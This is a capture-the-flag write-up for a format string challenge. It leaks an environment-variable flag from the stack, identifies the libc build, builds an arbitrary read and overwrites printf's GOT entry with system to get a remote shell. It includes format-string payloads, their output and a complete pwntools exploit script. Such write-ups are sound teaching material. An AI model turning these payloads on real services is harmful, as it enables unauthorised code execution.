#pwn #format-string

Part of the [[Hacky Holidays 2021]] CTF.

# Description

These space engines are super powerful. Note: the .py file is merely used as a wrapper around the binary. We did not put any vulnerabilities in the wrapper (at least not on purpose). The binary is intentionally not provided, but here are some properties:

```plain
Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      No PIE (0x400000)
```

Files: [engine.py](https://mega.nz/file/G09QyK4R#F6f6Z5osdIr7hhEwhYoUfa0oQmCblfOFvnSUtFsZ7vA) [engine.c](https://mega.nz/file/jt8kgI7C#shyWgiGxeEBUWsYfMmj8mloeunWsHv2PZ5ucFNPAGjM)

# Part 1

## Description

These new space engines don't have any regard for their environment. Hopefully you can find something useful.

## Static Analysis

Let's start by looking at `engine.py`. It uses `pwntools` to wrap the `engine` binary's input and output. The most important line is:

```python
if any(c not in string.ascii_letters + string.digits + string.punctuation for c in inp):
```

This means that we can only use printable ASCII characters (no whitespace, control characters or null bytes) in our input to the program.

Now let's review `engine.c`. The vulnerability here is pretty obvious: the user-controlled string `i` is passed as the first argument of `printf`, which leaves the program open to a format string exploit.

## Exploitation

The description of this part seems to hint at environment variables. Luckily for us these are stored on the stack, making them easy to read using the format string vulnerability.

A `$` in a format string allows you to specify the argument number. System V calling conventions mean that the first six arguments are stored in registers but after that they are taken from the stack. This allows us to read the entire stack step by step by incrementing the argument number.

We'll start by writing a function to get the value at a particular argument number using `pwntools`:

```python
def get(offset):
    io.sendlineafter("Command: ", f"%{offset}$016llx")
    io.recvuntil("(")
    try:
        return int(io.recv(16), 16)
    except ValueError:
        # The reply was not 16 hex digits, so treat the slot as empty.
        return 0
```

Now we can write a short snippet to increment the argument number and output the results as byte strings:

```python
for i in count():
    print(p64(get(i)))
```

Near the bottom of the output we find:

```plain
b'user\x00FLA'
b'G=CTF{5d'
b'f83ee123'
b'b2541708'
b'd3913df8'
b'ee4081}\x00'
```

Which means the first flag is `CTF{5df83ee123b2541708d3913df8ee4081}`.

# Part 2

## Description

Can you take control of the engine?

## Plan

The description of this part makes it clear that we need to get a shell. As the executable only has partial RELRO we can achieve this by overwriting a GOT (Global Offset Table) entry. We could, for example, overwrite `printf`'s entry with the address of `system`.

Whilst the GOT entry's address will be constant as PIE is disabled, we are not given the binary so it will take a bit of digging to find its location. We also aren't given the `libc` build so we will have to work that out to find the address of `system`. On top of this we are limited in the bytes we can use, which will make the write operation difficult.

## Build Identification

Let's start by identifying the `libc` build. Normally this would be quite easy as format string exploitation gives an arbitrary read primitive, but the input limitation means that we are very limited in which addresses we can write to the stack (and thus read from). Because of this limitation we will have to make the best of the addresses that are already on the stack.
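
To make the input limitation concrete, here is a minimal sketch (not part of the original solve script) that checks whether a packed 64-bit address would pass the wrapper's character filter. The helper names `sendable` and `rejected_bytes` are made up for illustration, and the check is deliberately strict: it assumes all eight bytes of the address would have to be sent.

```python
import string
import struct

# Same alphabet the wrapper accepts: letters, digits and punctuation.
ALLOWED = set((string.ascii_letters + string.digits + string.punctuation).encode())


def sendable(address):
    """Return True if every byte of the little-endian 64-bit address passes the filter."""
    packed = struct.pack("<Q", address)  # same layout as pwntools' p64
    return all(b in ALLOWED for b in packed)


def rejected_bytes(address):
    """List the bytes of the packed address that the filter would reject."""
    return [hex(b) for b in struct.pack("<Q", address) if b not in ALLOWED]


# The binary's base address (No PIE) contains null bytes, so it cannot be sent.
print(sendable(0x400000), rejected_bytes(0x400000))
# A value made purely of printable bytes would pass, but it is not a useful address.
print(sendable(0x4141414141414141))
```

Under this strict check any realistic user-space address fails because its top bytes are zero, which is why the rest of this part relies on pointers that are already on the stack.
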

We can start by writing a function to print a nice representation of the stack:

```python
def print_stack():
    for i in count():
        address = get(i)
        print(i, hex(address))
```

We can infer quite a lot from the output:

- There are a lot of addresses starting in `0x7ff` in a row. These are probably arrays, meaning that the addresses are most likely stack addresses.
- There are a number of other addresses starting in `0x7f`. These are most likely `libc` addresses as they span quite a large range.

Now we can write another function to leak the data stored at one of these addresses:

```python
def leak(offset):
    io.sendlineafter("Command: ", f"%{offset}$s")
    io.recvuntil("(")
    return io.recvuntil(")", drop=True)
```

And modify our `print_stack` function to also leak the data behind the likely `libc` addresses:

```python
def print_stack():
    for i in count():
        address = get(i)
        if 0x7f0000000000 <= address < 0x7ff000000000:
            print(i, hex(address), leak(i))
        else:
            print(i, hex(address))
```

We get the following relevant output lines:

```plain
5 0x7f330451f2d0 b'\x8bV\xfc\x89W\xfc\xc3f\x0f\x1f\x84'
35 0x7f33043d2bf7 b'\x89\xc7\xe8B\x16\x02'
51 0x7f33047b28d3 b'I\x83\xc6\x08L;4$u\xeb\x83\xeb\x01\x83\xfb\xff\x0f\x85C\xff\xff\xffH\x83\xc4\x18[]A\\A]A^A_\xc3\x0f\x1f\x84'
52 0x7f3304798638 b'P\xadT\x043\x7f'
99 0x7f33047a2000 b'\x7fELF\x02\x01\x01'
```

Interestingly there is an ELF header at `0x7f33047a2000` which probably belongs to the loader.

We can use the tooling provided by the [`libc` database project](https://github.com/niklasb/libc-database) to download a huge number of possible `libc` builds.
Following that we can write a script to only show the builds that contain the byte strings we leaked:

```python
from pathlib import Path

STRING_1 = b'\x8bV\xfc\x89W\xfc\xc3f\x0f\x1f\x84'
STRING_2 = b'\x89\xc7\xe8B\x16\x02'

for path in Path("libc-database/db").iterdir():
    if path.name.endswith("so"):
        with path.open("rb") as f:
            contents = f.read()
        if STRING_1 in contents and STRING_2 in contents:
            print(path)
```

We've only included a couple of the strings since the rest were close to or after the loader header, meaning they may not have been part of `libc`. Running the script gives the following output:

```plain
libc-database/db/libc6_2.27-3ubuntu1.3_amd64.so
libc-database/db/libc6_2.27-3ubuntu1.4_amd64.so
```

As there are only two possibilities we can try one and swap it for the other if the exploit fails.

## Arbitrary Read

The limitations imposed by the wrapper mean that we will have to be creative to obtain an arbitrary read and find the GOT entry. Again we will make use of the addresses already on the stack. If we can find an address on the stack that points to the stack then we can use the format string exploit to write an arbitrary address to the stack: `%{N}c` pads the output to `N` characters and `%lln` stores the number of characters printed so far as a 64-bit value through the pointer at the chosen argument. Following this we can use the format string exploit again to read the contents of the written address.

Any of the addresses starting in `0x7ff` are possible candidates so let's write a script to do a test write and then print the stack:

```python
offset_to_test = 1
io.sendlineafter("Command: ", f"%{0x1111}c%{offset_to_test}$lln")
print_stack()
```

A few of the offsets work. We will use offset 60, whose pointer targets the stack slot that is read as offset 61:

```plain
60 0x7fff5909e4b8
61 0x1111
```

Now we can write a function to read from any address:

```python
def read(address):
    io.sendlineafter("Command: ", f"%{address}c%60$lln")
    io.sendlineafter("Command: ", f"%61$s")
    io.recvuntil("(")
    return io.recvuntil(")", drop=True)
```

Let's test it with `print(read(0x400000))` to get the start of the binary.
As expected we receive an ELF header (`b'\x7fELF\x02\x01\x01'`).

Whilst in theory we should be able to read from any address, in practice a high address would involve receiving trillions of bytes, because the padding has to be as long as the address value. Luckily, however, the GOT is part of the `engine` binary and so resides at a fairly low address.

## GOT Entry

To get the approximate location of the GOT entry we can compile `engine.c` on the same operating system as the target. Searching for the `libc` builds we identified shows that the OS is Ubuntu 18.04. After installing an Ubuntu 18.04 VM and compiling `engine.c` with `-no-pie` we can use `gdb`'s `maintenance info sections` to see that `.got.plt` is at `0x00601000`, so that is where we should start our search:

```python
for i in count(0x00601000, 8):
    print(hex(i), hex(u64(read(i).ljust(8, b"\x00"))))
```

We get the following output:

```plain
0x601000 0x7fedc42e7aa0
0x601008 0x4005b6
0x601010 0x7fedc42ef5a0
0x601018 0x7fedc42cbf70
0x601020 0x7fedc43f0fb0
0x601028 0x7fedc4288b10
```

ASLR won't affect the lower 12 bits of addresses since the page size is `0x1000`. This means we can look at the lower three nibbles to identify which address is that of `printf`. Both `libc` builds have `printf` at `0x64f70`, so `0x601018` is the address of the relevant GOT entry.

## Shell

It's finally time to tie everything together and get a shell. We will start by loading the identified `libc` build and using one of the previously discovered byte strings to defeat ASLR:

```python
libc = ELF("libc-database/db/libc6_2.27-3ubuntu1.4_amd64.so")
libc.address = get(35) - next(libc.search(b"\x89\xc7\xe8B\x16\x02"))
```

Now we can use the format string exploit to write the GOT entry address to the stack:

```python
io.sendlineafter("Command: ", f"%{0x601018}c%60$lln")
```

Following this we just need to use the format string exploit again to overwrite `printf`'s GOT entry with the address of `system`.
In order to avoid printing trillions of characters we can just overwrite the lower 4 bytes. `%n` writes a 4-byte `int`, and the upper bytes of the resolved `printf` address should already match those of `system` as both live in the same `libc` mapping:

```python
io.sendlineafter("Command: ", f"%{libc.sym.system & 0xffffffff}c%61$n")
```

All we need to do now is wait for all the characters to be sent and make the IO interactive:

```python
io.recvuntil(")")
io.interactive()
```

A few minutes after starting the script we are given control. Every command we enter is now passed to `system` instead of `printf`. Entering `ls` shows that the file `you_are_an_amazing_hacker.txt` exists and confirms that we have a shell. Since we still can't use whitespace we can enter `cat<you_are_an_amazing_hacker.txt` to retrieve the flag (`CTF{4ffac46e926dcadeba7d365ff2b2a9af}`).

# Full Script

```python
from itertools import count

from pwn import *

io = remote(...)


def get(offset):
    io.sendlineafter("Command: ", f"%{offset}$016llx")
    io.recvuntil("(")
    try:
        return int(io.recv(16), 16)
    except ValueError:
        # The reply was not 16 hex digits, so treat the slot as empty.
        return 0


def leak(offset):
    io.sendlineafter("Command: ", f"%{offset}$s")
    io.recvuntil("(")
    return io.recvuntil(")", drop=True)


def print_stack():
    for i in count():
        address = get(i)
        if 0x7f0000000000 <= address < 0x7ff000000000:
            print(i, hex(address), leak(i))
        else:
            print(i, hex(address))


def read(address):
    io.sendlineafter("Command: ", f"%{address}c%60$lln")
    io.sendlineafter("Command: ", f"%61$s")
    io.recvuntil("(")
    return io.recvuntil(")", drop=True)


# Part 1: dump the stack as raw bytes to find the flag.
# for i in count():
#     print(p64(get(i)))

# Part 2: reconnaissance steps, kept for reference.
# print_stack()

# offset_to_test = 60
# io.sendlineafter("Command: ", f"%{0x1111}c%{offset_to_test}$lln")
# print_stack()

# print(read(0x400000))

# for i in count(0x00601000, 8):
#     print(hex(i), hex(u64(read(i).ljust(8, b"\x00"))))

# Part 2: rebase libc, point stack slot 61 at printf's GOT entry, then
# overwrite its lower 4 bytes with those of system.
libc = ELF("libc-database/db/libc6_2.27-3ubuntu1.4_amd64.so")
libc.address = get(35) - next(libc.search(b"\x89\xc7\xe8B\x16\x02"))

io.sendlineafter("Command: ", f"%{0x601018}c%60$lln")
io.sendlineafter("Command: ", f"%{libc.sym.system & 0xffffffff}c%61$n")

io.recvuntil(")")
io.interactive()
```
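
The address arithmetic from the GOT Entry and Shell sections can be checked offline with plain integers. The following is a minimal sketch rather than part of the exploit: the leaked values and the `printf` offset are copied from the output above, while `ASSUMED_SYSTEM_OFFSET` and the helper names are hypothetical placeholders (the real offset should come from `libc.sym.system` in the identified build).

```python
# GOT slots and their contents, copied from the GOT Entry output.
GOT_LEAK = {
    0x601000: 0x7fedc42e7aa0,
    0x601008: 0x4005b6,
    0x601010: 0x7fedc42ef5a0,
    0x601018: 0x7fedc42cbf70,
    0x601020: 0x7fedc43f0fb0,
    0x601028: 0x7fedc4288b10,
}
PRINTF_OFFSET = 0x64f70  # printf's offset in both candidate builds (from the writeup)
ASSUMED_SYSTEM_OFFSET = 0x4f550  # hypothetical placeholder, NOT taken from the writeup

PAGE_MASK = 0xfff  # ASLR only shifts mappings by whole 0x1000-byte pages


def find_got_slots(leak, symbol_offset):
    """Return the slots whose value shares its low 12 bits with the symbol offset."""
    return [
        slot
        for slot, value in leak.items()
        if (value & PAGE_MASK) == (symbol_offset & PAGE_MASK)
    ]


def overwrite_low32(old_value, new_value):
    """Model a 4-byte %n write: only the low 32 bits of the slot change."""
    return (old_value & ~0xffffffff) | (new_value & 0xffffffff)


matches = find_got_slots(GOT_LEAK, PRINTF_OFFSET)
printf_slot = matches[0]
libc_base = GOT_LEAK[printf_slot] - PRINTF_OFFSET
system_addr = libc_base + ASSUMED_SYSTEM_OFFSET
patched = overwrite_low32(GOT_LEAK[printf_slot], system_addr)

print([hex(slot) for slot in matches])  # slots that could hold printf
print(hex(libc_base))                   # should be page aligned
print(patched == system_addr)           # True when the upper 32 bits already match
```

The page-aligned base is a useful sanity check that the right symbol was matched. The partial overwrite only produces the intended address while the old and new values share their upper 32 bits.
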